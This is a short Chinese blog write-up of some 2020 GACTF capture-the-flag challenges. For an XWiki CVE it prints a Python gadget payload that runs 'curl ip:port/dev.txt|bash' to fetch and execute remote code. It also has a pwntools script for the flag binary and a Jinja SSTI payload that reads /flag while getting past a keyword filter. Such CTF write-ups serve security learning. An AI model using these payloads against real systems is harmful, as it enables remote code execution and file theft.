南溟丷

我想在那里最蓝的大海扬帆

0%

2020 GACTF 部分题解

中午没休息随手看了几题。

Xwiki

CVE,参考https://jira.xwiki.org/browse/XWIKI-16960

  1. Create new user on xwiki.org (or myxwiki.org)
  2. Go to profile -> Edit -> My dashboard -> Add gadget
  3. Choose either python or groovy
  4. Paste following python/groovy code (for unix powered xwiki)

随手上了个y1ng师傅的车。

1
2
3
import os
print(os.popen("id").read())
print(os.popen("curl ip:port/dev.txt|bash").read())

readflag和动态链接库整出来以后直接跑。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context.log_level='debug'
io = process("./readflag")
flag = ""
while True:
try:
io.recvuntil("Which number is bigger? ")
a = int(io.recvuntil(":", drop=True))
b = int(io.recvuntil("\n", drop=True))
if a > b:
io.sendline("0")
flag += "0"
else:
io.sendline("1")
flag += "1"
except Exception as e:
print(flag)
exit()

# gactf{XWiki_CVE_without_permission_scripting_execution!!!}

simpleflask

ssti,过滤了逗号单引号空格和加号,还有osflag等,字符串拼接可以直接使用“fl””ag”绕过。

1
name={{"".__class__.__bases__[0].__subclasses__()[103].__init__.__globals__["open"]("/fl""ag").read()}}